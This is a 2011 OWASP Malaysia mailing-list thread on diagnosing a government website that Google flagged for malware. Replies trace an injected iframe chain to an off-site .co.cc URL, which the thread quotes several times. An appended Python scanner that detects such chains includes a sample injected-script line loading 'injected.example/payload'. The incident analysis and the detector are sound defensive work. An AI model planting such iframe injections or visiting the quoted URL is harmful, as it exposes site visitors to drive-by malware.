[Owasp-Malaysia] Malware Detected!

Adnan bin Mohd Shukor adnan.shukor at gmail.com
Tue Feb 8 04:21:57 EST 2011


Here is the flow:

1) your indexsedc.php has an iframe to sedc.php
2) and your sedc.php has an iframe to default.php
3) and in default.php (look at the last 2 lines), JavaScript will
actually create an iframe to
asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==

thanks :)

On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> can you point...
> my index.htm or indexsedc.php or other file?
>
> On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
> <adnan.shukor at gmail.com> wrote:
>>
>> you have an iframe pointing to
>> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>
>> which is not XSS :)
>>
>> From my personal point of view, it's either caused by:
>> 1) malware on the PC which has been used for FTP/access to the server
>> 2) compromised server
>>
>> you can send your access.log to cyber999 at cybersecurity.my or
>> mycert at mycert.org.my for further analysis :)
>>
>> thanks
>>
>> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> > I have checked it.
>> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <rastaboyz at gmail.com> wrote:
>> >>
>> >> Hi Mohd Syamsuri,
>> >>
>> >> Why don't you check the reason why it's being blocked? It might help.
>> >>
>> >>
>> >>
>> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>> >>
>> >>
>> >>
>> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>> >>
>> >> Regards,
>> >> Kishur
>> >>
>> >>
>> >>
>> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri <msyamsuri at gmail.com>
>> >> wrote:
>> >>>
>> >>> Assalamualaikum and good day to my fellow friends.
>> >>> I need some advice.
>> >>> The web site of Perbadanan Kemajuan Iktisad Negeri Kelantan
>> >>> (http://www.pkink.gov.my) has been blocked by Google for almost 4
>> >>> days.
>> >>> It said that we host malware on our server: Malware Detected! (Google
>> >>> said that!!)
>> >>> What I did is:
>> >>> 1. Scan all the data and upload new data
>> >>> 2. Check the index.html or index.php
>> >>> 3. Scan using web scanners:
>> >>> http://www.avgthreatlabs.com/
>> >>> http://www.virustotal.com
>> >>> but it still gets blocked.
>> >>> Google said: Suspected injected code
>> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php" NAME="confcontent"
>> >>> scrolling=yes >
>> >>> I have been using this code for almost 2 years.
>> >>> What should I do now?
>> >>>
>> >>> --
>> >>> best regard
>> >>> syamsuri
>> >>>
>> >>>
>> >>>
>> >>> _______________________________________________
>> >>> Owasp-Malaysia mailing list
>> >>> Owasp-Malaysia at lists.owasp.org
>> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >>>
>> >>> OWASP Malaysia Wiki
>> >>> http://www.owasp.org/index.php/Malaysia
>> >>>
>> >>> OWASP Malaysia Wiki Facebook
>> >>>
>> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >>
>> >>
>> >
>> >
>> >
>> > --
>> > best regard
>> > syamsuri
>> >
>> >
>> >
>> >
>
>
>
> --
> best regard
> syamsuri
>
>
>
>
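
The chain traced in this thread (a frame to indexsedc.php, then sedc.php, then default.php, where script builds an off-site iframe) can be walked mechanically over a copy of the web root. The following is an added example, not part of the original thread; the file contents and the hosts `www2.site.example` and `injected.example` are constructed placeholders, and it assumes a flat web root and an iframe `src` assigned as a plain string literal.

```python
import re
from urllib.parse import urlparse

# <frame>/<iframe> tags written in the markup, case-insensitive, quotes optional.
TAG_SRC = re.compile(r'<i?frame\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
# Script that builds an iframe at run time and assigns its src as a string literal.
JS_IFRAME = re.compile(r'createElement\(\s*["\']iframe["\']\s*\)', re.I)
JS_SRC = re.compile(r'\.src\s*=\s*["\']([^"\']+)["\']', re.I)

def frame_targets(content):
    """Return (url, how) for every frame a file declares or builds in script."""
    found = [(url, "tag") for url in TAG_SRC.findall(content)]
    if JS_IFRAME.search(content):
        found += [(url, "script") for url in JS_SRC.findall(content)]
    return found

def trace(files, entry, own_hosts):
    """Walk frame references from `entry`; return (chain, off-site findings)."""
    chain, external, queue = [], [], [entry]
    while queue:
        name = queue.pop(0)
        if name in chain or name not in files:
            continue  # already visited, or not a file we hold
        chain.append(name)
        for url, how in frame_targets(files[name]):
            parsed = urlparse(url)
            if parsed.hostname is None or parsed.hostname in own_hosts:
                queue.append(parsed.path.rsplit("/", 1)[-1])  # follow locally
            else:
                external.append((name, parsed.hostname, how))
    return chain, external

# Constructed sample files mirroring the chain in the thread; hosts are placeholders.
SAMPLE = {
    "index.htm": '<FRAME SRC="http://www2.site.example/indexsedc.php" '
                 'NAME="confcontent" scrolling=yes >',
    "indexsedc.php": '<iframe src="sedc.php"></iframe>',
    "sedc.php": '<iframe src="default.php"></iframe>',
    "default.php": '<p>content</p>\n<script>var f=document.createElement("iframe");\n'
                   'f.src="http://injected.example/payload";'
                   'document.body.appendChild(f);</script>',
}

if __name__ == "__main__":
    chain, external = trace(SAMPLE, "index.htm", {"www2.site.example"})
    print(" -> ".join(chain))
    for name, host, how in external:
        print(f"{name}: off-site iframe to {host} (via {how})")
```

Injected script is often obfuscated, so a clean result from this pattern match does not clear a file; comparing each file against a known-good copy is the stronger check.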

